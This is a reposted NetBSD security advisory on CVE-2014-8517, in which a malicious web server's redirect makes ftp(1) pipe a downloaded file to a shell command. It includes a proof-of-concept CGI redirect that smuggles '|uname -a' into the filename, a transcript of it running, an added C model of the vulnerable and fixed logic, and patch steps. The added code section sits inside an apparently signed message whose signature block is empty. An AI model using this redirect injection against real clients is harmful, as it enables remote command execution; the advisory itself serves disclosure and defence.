BSDSec

deadsimple BSD Security Advisories and Announcements

NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		NetBSD Security Advisory 2014-013
		=================================

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver


Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp):	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If ftp(1) is used as an HTTP client to fetch data from a website, and no
output file is given with the -o option, the client can be tricked into
executing arbitrary commands.

When acting as an HTTP client, ftp(1) follows HTTP redirects and, unless
-o filename is specified, uses the part of the path after the last '/'
of the last resource it accesses as the output filename. That part is
taken from the final URL, which a redirecting server controls, and is
used after decoding %XX escapes (so %20 becomes a space).

Once the output filename has been resolved, ftp(1) applies the same rule
it applies to a user-supplied -o name: if the name begins with '|', the
remainder is passed to popen(3), the shell runs it, and the fetched data
is written to the command's standard input.

Thus a malicious web site can hide '|command' in a redirect and make the
client execute 'command' when ftp(1) fetches that URL.

     a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
     a20$

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying 127.0.0.1:80 ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
     Requesting http://192.168.2.19/cgi-bin/|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
     a20$
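The output-name selection described above, modelled as an added example in C
(this is not code from src/usr.bin/ftp/fetch.c or any NetBSD release):
resolve_vulnerable() reproduces the pre-fix behaviour, where a name derived
from the final, server-controlled URL is tested for a leading '|' exactly
like a user-supplied -o name, and resolve_fixed() follows the advisory's
description of the fix by honouring '|' only for the -o name. The %XX
decoding helper, the enum of actions, the 256-byte name buffer and the
decision to reject an empty or '|'-prefixed derived name are the example's
own choices and assumptions; nothing here calls popen(3), the functions only
report what ftp(1) would do with the redirect target from the transcript.

```c
/*
 * ftp(1) output-name selection for an HTTP fetch, modelled in the shape
 * NetBSD-SA2014-013 describes and in a hardened shape. Added example, not
 * code from src/usr.bin/ftp/fetch.c. Assumes the derived name is the URL
 * path after the last '/', %XX-decoded, and only a leading '|' is special.
 * Nothing here calls popen(3): the functions report what ftp would do.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum action {
	ACT_WRITE_FILE,	/* open name for writing */
	ACT_POPEN,	/* popen(name + 1, "w"): the shell runs the command */
	ACT_REJECT	/* refuse the name and report an error */
};

struct output {
	enum action act;
	char name[256];
};

/* Decode %XX escapes from src into dst, which has room for dstlen bytes. */
static void
url_unescape(const char *src, char *dst, size_t dstlen)
{
	size_t i = 0;
	while (*src != '\0' && i + 1 < dstlen) {
		if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
		    isxdigit((unsigned char)src[2])) {
			char hex[3] = { src[1], src[2], '\0' };
			dst[i++] = (char)strtol(hex, NULL, 16);
			src += 3;
		} else
			dst[i++] = *src++;
	}
	dst[i] = '\0';
}

/* The part of the URL after the last '/': the name ftp would save under. */
static const char *
url_basename(const char *url)
{
	const char *slash = strrchr(url, '/');
	return slash != NULL ? slash + 1 : url;
}

/* True if the resolved name equals s. */
static int
name_is(struct output o, const char *s)
{
	return strcmp(o.name, s) == 0;
}

/*
 * Vulnerable shape: whether the name came from -o or from the final,
 * server-controlled URL, a leading '|' sends the rest to popen(3).
 */
static struct output
resolve_vulnerable(const char *final_url, const char *user_outfile)
{
	struct output o;
	if (user_outfile != NULL)
		snprintf(o.name, sizeof o.name, "%s", user_outfile);
	else
		url_unescape(url_basename(final_url), o.name, sizeof o.name);
	o.act = (o.name[0] == '|') ? ACT_POPEN : ACT_WRITE_FILE;
	return o;
}

/*
 * Hardened shape, per the advisory's description of the fix: '|' counts
 * only for the user-supplied -o name. A server-derived name is a plain
 * filename; rejecting it when empty or '|'-prefixed is this example's choice.
 */
static struct output
resolve_fixed(const char *final_url, const char *user_outfile)
{
	struct output o;
	if (user_outfile != NULL) {
		snprintf(o.name, sizeof o.name, "%s", user_outfile);
		o.act = (o.name[0] == '|') ? ACT_POPEN : ACT_WRITE_FILE;
		return o;
	}
	url_unescape(url_basename(final_url), o.name, sizeof o.name);
	o.act = (o.name[0] == '\0' || o.name[0] == '|') ? ACT_REJECT
	    : ACT_WRITE_FILE;
	return o;
}

int main(void)
{
	/* Constructed input: the Location target from the advisory's transcript. */
	const char *url = "http://192.168.2.19/cgi-bin/|uname%20-a";
	struct output v = resolve_vulnerable(url, NULL), f = resolve_fixed(url, NULL);
	printf("vulnerable: act=%d name=\"%s\"\n", (int)v.act, v.name);
	printf("fixed:      act=%d name=\"%s\"\n", (int)f.act, f.name);
	return 0;
}
```

Compiled and run, the vulnerable resolver turns the redirect target into the
popen command "uname -a" (act=1), while the fixed resolver rejects the same
input (act=2), still writes an ordinary derived name such as base.tgz to a
file, and still lets an explicit "-o '|command'" pipe output as before.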


Solutions and Workarounds
=========================

Workaround: specifying an output filename with "ftp -o <filename>"
circumvents the issue, because the name derived from the server's URL is
then never used.

Solution:
Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

(The -o argument in the fetch above is the workaround, so the download is
safe even when performed with the still-vulnerable ftp(1).)

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206
netbsd-7     1.205.4.1
netbsd-6     1.195.2.2
netbsd-6-1   1.195.8.1
netbsd-6-0   1.195.6.1
netbsd-5     1.185.6.3
netbsd-5-2   1.185.6.2.4.1
netbsd-5-1   1.185.14.1



Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

	2014-11-03	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)
-----END PGP SIGNATURE-----